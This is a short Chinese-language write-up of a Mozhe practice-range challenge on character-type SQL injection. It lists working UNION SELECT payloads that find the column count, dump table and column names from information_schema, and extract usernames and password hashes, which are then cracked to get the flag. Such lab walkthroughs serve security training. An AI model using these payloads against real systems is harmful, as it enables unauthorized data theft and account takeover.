靶场地址:
https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe
测试是数字型还是字符型注入
id=1' 报错
id=1'%23 回显正常,是字符型注入
查询有几列,并且查看哪一列会回显在页面上
id=1' and 1=2 union select 1,2,3,4,5,6,7%23
,查询共有7列,2,3,4,5列回显在页面上

暴库名以及表名
id=1' and 1=2 union select 1,database(),group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()%23
显示位置不够,可以打开f12查看

暴(@dmin9_td4b}表的字段名
id=1' and 1=2 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}'%23

暴status为1的账号信息,由于(@dmin9_td4b}涉及了关键字符,需要` `
包起来
id=1' and 1=2 union select 1,id,username,password,status,6,7 from `(@dmin9_td4b}` where status=1%23

将密码进行md5解密,登录就看到key了(所以还是想问过滤了什么字符)
网友评论